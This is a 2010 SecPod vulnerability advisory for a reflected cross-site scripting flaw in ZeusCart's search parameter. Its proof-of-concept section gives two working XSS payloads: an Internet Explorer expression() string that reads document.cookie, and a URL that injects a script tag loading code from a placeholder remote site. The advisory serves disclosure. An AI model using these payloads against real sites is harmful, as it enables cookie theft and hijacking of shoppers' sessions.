#######################################################################
ZeusCart Ecommerce Shopping Cart Software Cross-Site scripting Vulnerability
SecPod Technologies (www.secpod.com)
Author Sooraj K.S
#######################################################################
SecPod ID: 1003
07/28/2010 Issue Discovered
07/30/2010 Vendor Notified
No Response from Vendor
Class: Cross-Site Scripting
Severity: Medium
Overview:
ZeusCart Ecommerce Shopping Cart Software is prone to a cross-site scripting
vulnerability.

Description:
ZeusCart Ecommerce Shopping Cart Software is prone to a cross-site scripting
vulnerability because it fails to properly sanitize user-supplied input.
Input passed via the 'search' parameter of the 'search' action in index.php is
not properly validated or encoded before it is returned to the user. This can be
exploited to execute arbitrary HTML and script code in a user's browser session
in the context of a vulnerable site, which may allow an attacker to steal
cookie-based authentication credentials and to launch other attacks.
The vulnerability has been tested in ZeusCart 3.0 and 2.3. Other versions may
also be affected.
Impact:
Successful exploitation allows an attacker to execute arbitrary HTML and script
code in a user's browser session in the context of a vulnerable site.

Affected Software:
ZeusCart 3.0
ZeusCart 2.3

Tested on:
ZeusCart 3.0 and 2.3 (tested using the Microsoft Internet Explorer browser)
References:
http://www.zeuscart.com/
http://secpod.org/blog/?p=109
http://secpod.org/advisories/SECPOD_ZeusCart_XSS.txt
Proof of Concept:
1) Enter the following string in the search box and click Search:
'"%22%20style=x:expression(alert(document.cookie))><"
When tested on ZeusCart 3.0 and 2.3, this script executed only in the
Microsoft Internet Explorer browser.
2) The following request worked on ZeusCart 2.3:
http://www.example.com/?do=search&search='"><SCRIPT SRC=//REMOTE_SITE_SCRIPT>
Solution:
Fix not available from the vendor.
CVSS Score Report:
ACCESS_VECTOR = NETWORK
ACCESS_COMPLEXITY = MEDIUM
AUTHENTICATION = NONE
CONFIDENTIALITY_IMPACT = NONE
INTEGRITY_IMPACT = PARTIAL
AVAILABILITY_IMPACT = NONE
EXPLOITABILITY = PROOF_OF_CONCEPT
REMEDIATION_LEVEL = UNAVAILABLE
REPORT_CONFIDENCE = CONFIRMED
CVSS Base Score = 4.3 (MEDIUM) (AV:N/AC:M/Au:N/C:N/I:P/A:N)
Credits:
Sooraj K.S of SecPod Technologies has been credited with the discovery of this
vulnerability.